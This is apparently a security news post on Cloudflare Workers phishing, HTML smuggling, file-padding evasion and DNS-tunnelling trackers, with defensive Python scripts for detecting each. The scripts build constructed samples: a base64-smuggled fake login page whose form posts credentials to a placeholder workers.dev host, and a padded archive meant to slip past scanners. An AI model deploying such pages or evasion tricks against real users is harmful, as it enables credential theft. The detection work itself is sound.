Saturday, July 6, 2024

Cloudflare Workers, HTML Smuggling, and GenAI

Phishing Playbook

Cybersecurity researchers are warning about a phishing campaign that is exploiting Cloudflare Workers to serve up phishing sites used to harvest user credentials related to Microsoft, Gmail, Yahoo!, and cPanel Webmail.

The technique, known as transparent phishing or adversary-in-the-middle (AitM) phishing, “uses Cloudflare Workers as a reverse proxy server for the legitimate login page to intercept traffic between the victim and the login page and steal credentials, cookies, and tokens,” Netskope researcher Jan Michael Alcantara wrote in the report.

The majority of phishing campaigns hosted on Cloudflare Workers in the past 30 days targeted victims in Asia, North America, and Southern Europe across the technology, financial services, and banking industries.

The cybersecurity firm noted that traffic to phishing pages hosted on Cloudflare Workers first rose in Q2 2023, and that the number of distinct domains involved grew from just over 1,000 in Q4 2023 to nearly 1,300 in Q1 2024.

The phishing campaign uses HTML smuggling, a technique in which the malicious payload is assembled in the victim's browser by JavaScript embedded in an HTML file rather than being transferred as a recognisable file over the network, which lets it slip past perimeter and e-mail inspection. Its use here shows how far threat actors have gone in refining the delivery and execution of attacks against targeted systems.

The difference in this case is that the smuggled payload is not a malware binary but a phishing page, which is reconstructed in the browser and shown to the user.


The phishing page itself prompts victims to sign in with Microsoft Outlook or Office 365 (now Microsoft 365) to view a PDF document. If the victim complies, a fake sign-in page hosted on Cloudflare Workers is used to collect credentials and multi-factor authentication (MFA) codes.

“The entire phishing page is created using a modified version of the open source Cloudflare AitM toolkit,” says Alcantara. “When the victim visits the attacker’s login page, the attacker collects web request metadata.”

“When the victim enters their credentials, they are logged into the legitimate website and the attacker collects the tokens and cookies included in the response. Additionally, the attacker can learn about any additional activity the victim performs after logging in.”

HTML smuggling as a payload delivery mechanism is becoming increasingly favored by threat actors looking to evade modern defenses, allowing them to deliver malicious HTML pages and other malware without raising any warnings.

In one example noted by Huntress Labs, an HTML attachment injected an iframe that displayed what looked like the legitimate Microsoft authentication portal but was served from a domain controlled by the attackers.

“This has the hallmarks of an MFA-bypassing man-in-the-middle proxy phishing attack, but it uses an HTML smuggled payload with an injected iframe rather than a simple link,” security researcher Matt Kiely said.

Another campaign that has garnered attention is invoice-themed phishing emails that contain HTML attachments disguised as PDF viewer login pages, stealing users’ email account credentials and redirecting them to a URL hosting a so-called “proof of payment.”
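The three HTML-attachment patterns described above (a smuggled, base64-encoded page rebuilt with JavaScript; an injected iframe pointing at a proxied Microsoft login; a "PDF viewer" page whose form posts credentials elsewhere) can all be caught by static triage before the file ever reaches a browser. The script below is an added example, not code from Netskope, Huntress or Trellix: it searches an HTML file for the JavaScript primitives smuggled payloads rely on, decodes any large base64 string literal, and inspects both the outer file and the decoded layers for iframes and credential forms that target non-Microsoft hosts, calling out `*.workers.dev` hosts specifically. The sample attachment at the bottom and the hostnames in it are constructed placeholders, and the set of legitimate Microsoft sign-in hosts is an assumption you should extend with your own tenant's federation endpoints.

```python
"""Static triage of an HTML attachment for HTML-smuggling indicators (added example)."""
import base64
import re

# JavaScript calls commonly used to assemble and render a payload client-side.
SMUGGLING_PRIMITIVES = (
    "atob(", "Blob(", "createObjectURL(", "msSaveOrOpenBlob(",
    "msSaveBlob(", "Uint8Array(", "document.write(",
)

# Hosts a genuine Microsoft sign-in page is served from (assumption: extend with
# your own tenant's federation endpoints).
LEGIT_LOGIN_HOSTS = {
    "login.microsoftonline.com", "login.live.com", "login.microsoft.com",
}

B64_LITERAL = re.compile(r"""['"]([A-Za-z0-9+/]{64,}={0,2})['"]""")
IFRAME_SRC = re.compile(r"""<iframe[^>]*\ssrc\s*=\s*['"]([^'"]+)['"]""", re.I)
FORM_ACTION = re.compile(r"""<form[^>]*\saction\s*=\s*['"]([^'"]+)['"]""", re.I)
URL_HOST = re.compile(r"^https?://([^/:?#]+)", re.I)
HTML_START = (b"<!doctype", b"<html", b"<script", b"<div", b"<form", b"<body")


def decode_blobs(html):
    """Decode every base64 string literal long enough to be hiding content."""
    blobs = []
    for literal in B64_LITERAL.findall(html):
        try:
            blobs.append(base64.b64decode(literal, validate=True))
        except ValueError:  # binascii.Error is a ValueError: not real base64
            continue
    return blobs


def host_of(url):
    m = URL_HOST.match(url.strip())
    return m.group(1).lower() if m else None


def describe_host(host):
    return f"{host} (Cloudflare Workers)" if host.endswith(".workers.dev") else host


def triage(html):
    """Return human-readable findings; an empty list means nothing suspicious was seen."""
    findings = []
    primitives = [p for p in SMUGGLING_PRIMITIVES if p in html]
    if primitives:
        findings.append("smuggling primitives: " + ", ".join(primitives))

    blobs = decode_blobs(html)
    if blobs:
        findings.append(f"{len(blobs)} base64 blob(s), {sum(map(len, blobs))} bytes decoded")

    # Inspect the outer file plus every decoded blob that is itself HTML.
    layers = [html] + [
        b.decode("utf-8", "replace") for b in blobs
        if b[:32].lstrip().lower().startswith(HTML_START)
    ]
    for layer in layers:
        for src in IFRAME_SRC.findall(layer):
            host = host_of(src)
            if host and host not in LEGIT_LOGIN_HOSTS:
                findings.append("iframe to non-Microsoft host: " + describe_host(host))
        for action in FORM_ACTION.findall(layer):
            host = host_of(action)
            if host and host not in LEGIT_LOGIN_HOSTS:
                findings.append("credential form posts to: " + describe_host(host))
    return findings


# Constructed sample: an outer file that decodes and writes a second page holding
# an iframe to a proxied login page and a form that posts to the same placeholder host.
INNER_PAGE = """<html><body>
<p>Sign in to view the PDF</p>
<iframe src="https://login-proxy.example.workers.dev/common/oauth2/v2.0/authorize"></iframe>
<form action="https://login-proxy.example.workers.dev/collect" method="post">
<input name="loginfmt"><input name="passwd" type="password"></form>
</body></html>"""
SAMPLE_ATTACHMENT = (
    "<html><body><script>\n"
    "var page = atob('" + base64.b64encode(INNER_PAGE.encode()).decode() + "');\n"
    "document.write(page);\n"
    "</script></body></html>"
)

if __name__ == "__main__":
    for finding in triage(SAMPLE_ATTACHMENT):
        print("-", finding)
```

Run it against a quarantined `.html` attachment by reading the file into `triage()`. The decode step matters: the outer file of a smuggled page contains no iframe, no form and no suspicious URL, so a scanner that does not unpack the blob sees only a script and a string.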

Email-based phishing attacks have taken many forms in recent years, with attackers leveraging Phishing-as-a-Service (PhaaS) toolkits such as Greatness to steal Microsoft 365 login credentials, using AitM techniques to circumvent MFA, or embedding QR codes within PDF files and using CAPTCHA checks to redirect victims to fake login pages.

Greatness PhaaS has been observed targeting financial services, manufacturing, energy/utilities, retail and consulting companies, with victims concentrated in the United States, Canada, Germany, South Korea and Norway.

“These services offer advanced capabilities that are attractive to attackers by saving time on development and evasion tactics,” Trellix researchers said.

The development comes as threat actors continue to look for new ways to get past security controls and spread malware, including using generative artificial intelligence (GenAI) to craft convincing phishing emails and delivering compressed attachments containing oversized malware payloads (more than 100 MB) to evade analysis.

“Scanning large files may require more time and resources and may slow down overall system performance during the scanning process,” the cybersecurity firm said. “To minimize heavy memory usage, some antivirus engines may set size limits for scanning and skip files that are too large.”


The company added that this file inflation (padding) technique has been observed delivering malware such as Agent Tesla, AsyncRAT, Quasar RAT, and Remcos RAT.
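The padding trick works because the inflated file is almost entirely a run of one repeated byte, which means it also has two easy tells: the member compresses at an absurd ratio, and stripping the trailing run recovers the real payload, whose size and hash no longer depend on how much padding was added. The following is an added example, not code from the vendor cited above. It constructs an in-memory zip whose member is a small stand-in for an executable followed by a few MiB of null bytes (far less than the 100 MB the article mentions, only to keep the example fast), then reports the ratio, whether the stored size crosses an assumed 100 MB scanner cut-off, and the size and SHA-256 of the payload once the padding is removed.

```python
"""Detect and undo file inflation (padding) in a compressed attachment (added example)."""
import hashlib
import io
import zipfile


def build_padded_archive(payload, pad_bytes, member="invoice.exe", pad_byte=b"\x00"):
    """Constructed sample: a zip whose member is payload + pad_bytes of one repeated byte."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(member, payload + pad_byte * pad_bytes)
    return buf.getvalue()


def strip_padding(data, min_run=64 * 1024):
    """Remove a trailing run of a single repeated byte if it is at least min_run long."""
    if not data:
        return data
    last = data[-1:]
    kept = len(data.rstrip(last))  # rstrip with a 1-byte argument drops only that byte
    if len(data) - kept >= min_run:
        return data[:kept]
    return data


def inspect_archive(zip_bytes, ratio_threshold=50.0, oversize_bytes=100 * 1024 * 1024):
    """Per member: compression ratio, whether it exceeds the assumed scanner size
    cut-off, and the size and SHA-256 of the payload with trailing padding removed."""
    report = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            ratio = info.file_size / max(info.compress_size, 1)
            data = zf.read(info)
            real = strip_padding(data)
            report.append({
                "name": info.filename,
                "stored_size": info.file_size,
                "ratio": round(ratio, 1),
                "suspicious_ratio": ratio >= ratio_threshold,
                "oversized": info.file_size > oversize_bytes,
                "padding_bytes": len(data) - len(real),
                "real_size": len(real),
                "real_sha256": hashlib.sha256(real).hexdigest(),
            })
    return report


# Constructed stand-in for an executable: an MZ header plus non-repeating filler.
FAKE_PAYLOAD = b"MZ" + bytes(range(256)) * 16

if __name__ == "__main__":
    for pad in (4 * 1024 * 1024, 6 * 1024 * 1024):
        for entry in inspect_archive(build_padded_archive(FAKE_PAYLOAD, pad)):
            print(entry)
```

Hashing the stripped payload rather than the file as received is the practical point: every recipient can get a differently padded copy with a unique hash, but the `real_sha256` values collapse back to one indicator. A scanner fed `strip_padding()` output also sees a file well under any size limit.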

Additionally, various threat actors are misusing GenAI for exploit development and deepfake generation, highlighting the need for robust security measures, ethical guidelines, and oversight mechanisms.

These innovations to evade traditional detection mechanisms also extend to campaigns such as TrkCdn, SpamTracker, and SecShow, which utilize Domain Name System (DNS) tunneling to monitor when targets open phishing emails or click on malicious links, track the distribution of spam, and scan victim networks for potential vulnerabilities.

“The DNS tunneling technique used in the TrkCdn attacks is intended to track victim interactions with email content,” Palo Alto Networks Unit 42 said in a report published earlier this month, adding that attackers embed content in emails that, when opened, perform DNS queries to attacker-controlled subdomains.

“(SpamTracker) uses emails and website links to deliver spam and phishing content. The goal of these campaigns is to lure victims into clicking on links where threat actors have hidden their payloads in subdomains.”
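The tracking described for TrkCdn and SpamTracker leaves a recognisable shape in resolver logs: one parent domain receives many queries, nearly every one for a different, random-looking subdomain that is looked up exactly once, because each label is the per-recipient identifier carried in the query name. The script below is an added example and not Unit 42's code. It parses constructed resolver log lines, groups queries by parent domain, and flags domains whose unique-name ratio and leftmost-label entropy are both high. The log format (timestamp, client, qname, qtype) and the approximation of the registered domain by its last two labels (instead of consulting the public suffix list) are assumptions.

```python
"""Spot DNS-tunnelling beacons of the TrkCdn / SpamTracker kind in resolver logs (added example)."""
import math
import re
from collections import defaultdict

# Assumed log shape: "<timestamp> <client> <qname> <qtype>".
LOG_LINE = re.compile(r"^(?P<ts>\S+)\s+(?P<client>\S+)\s+(?P<qname>\S+)\s+(?P<qtype>\S+)$")


def shannon_entropy(s):
    """Bits per character of the string (4.0 for 16 distinct characters)."""
    if not s:
        return 0.0
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def parent_domain(qname, labels=2):
    """Assumption: the registered domain is the last two labels (no public suffix list)."""
    parts = qname.rstrip(".").lower().split(".")
    return ".".join(parts[-labels:])


def analyze(lines, min_queries=5, unique_ratio=0.8, min_entropy=3.0):
    """Return {parent_domain: stats} for domains whose query pattern looks like a beacon."""
    stats = defaultdict(lambda: {"queries": 0, "fqdns": set(), "clients": set(), "entropy": []})
    for line in lines:
        m = LOG_LINE.match(line.strip())
        if not m:
            continue
        qname = m.group("qname").rstrip(".").lower()
        st = stats[parent_domain(qname)]
        st["queries"] += 1
        st["fqdns"].add(qname)
        st["clients"].add(m.group("client"))
        st["entropy"].append(shannon_entropy(qname.split(".")[0]))

    flagged = {}
    for dom, st in stats.items():
        if st["queries"] < min_queries:
            continue  # too little traffic to judge
        ratio = len(st["fqdns"]) / st["queries"]
        mean_ent = sum(st["entropy"]) / len(st["entropy"])
        if ratio >= unique_ratio and mean_ent >= min_entropy:
            flagged[dom] = {
                "queries": st["queries"],
                "unique_fqdns": len(st["fqdns"]),
                "clients": len(st["clients"]),
                "mean_label_entropy": round(mean_ent, 2),
            }
    return flagged


# Constructed log: six clients each resolving a unique hex label under one placeholder
# domain (the beacon), mixed with ordinary repeated lookups of Microsoft hosts.
SAMPLE_LOG = """\
2024-05-28T09:12:01Z 10.0.0.5 a1b2c3d4e5f60718.cdn.tracker-example.test A
2024-05-28T09:12:03Z 10.0.0.5 www.microsoft.com A
2024-05-28T09:12:07Z 10.0.0.9 9f8e7d6c5b4a3210.cdn.tracker-example.test A
2024-05-28T09:12:09Z 10.0.0.9 www.microsoft.com A
2024-05-28T09:13:44Z 10.0.0.12 0f1e2d3c4b5a6978.cdn.tracker-example.test A
2024-05-28T09:13:50Z 10.0.0.12 login.microsoftonline.com A
2024-05-28T09:15:02Z 10.0.0.5 deadbeef01234567.cdn.tracker-example.test A
2024-05-28T09:15:05Z 10.0.0.5 www.microsoft.com A
2024-05-28T09:16:30Z 10.0.0.21 c0ffee1234567890.cdn.tracker-example.test A
2024-05-28T09:16:35Z 10.0.0.21 login.microsoftonline.com A
2024-05-28T09:18:11Z 10.0.0.33 1234567890abcdef.cdn.tracker-example.test A
2024-05-28T09:18:15Z 10.0.0.33 www.microsoft.com A
2024-05-28T09:19:40Z 10.0.0.40 www.microsoft.com A
""".splitlines()

if __name__ == "__main__":
    for dom, info in analyze(SAMPLE_LOG).items():
        print(dom, info)
```

Note the two thresholds work together: large CDNs also produce many distinct names under one domain, but their labels are low-entropy words, and a handful of random labels under a domain everyone queries repeatedly fails the unique-name ratio. Tune `min_queries` up on a busy resolver, and pair a hit with mail logs to find which message carried the tracking content.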

The findings come amid a surge in malvertising campaigns that leverage malicious advertisements for popular software in search engine results to trick users into installing information stealers and remote access trojans such as SectopRAT (aka ArechClient).

Bad actors have also been seen creating fake pages that imitate financial institutions such as Barclays and offer what looks like live chat support, during which the victim is talked into installing legitimate remote desktop software such as AnyDesk, giving the attackers remote access to the system.
